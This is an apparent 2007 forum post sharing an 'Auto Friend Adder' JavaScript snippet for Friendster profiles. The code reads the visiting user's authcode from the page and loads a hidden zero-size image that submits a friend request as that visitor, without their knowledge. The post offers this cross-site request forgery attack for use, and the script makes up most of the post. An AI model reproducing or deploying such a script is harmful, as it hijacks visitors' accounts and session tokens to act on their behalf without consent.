[quote][align=center][color=red][b]Auto Friend Adder[/b][/color][/align][/quote]
This code will make the viewer automatically make a friend request to the profile with this code without him/her knowing it.
[b]Code:[/b]
<">Replace [b]PUT YOUR FRIENDSTER ACCOUNTS E-MAIL ADDRESS HERE[/b] with your Friendster account e-mail address.
[b]Example:[/b]
[quote]var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "testing@domain.com";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};[/quote]
This is a [i].js[/i] script.
Go [url=http://theftalk.com/t13159-Javascript-Linker.html]HERE[/url] for instructions on how to make a [i].js[/i] file and upload it to a host.
Last edited by aftermath (2007-11-11 12:43:03)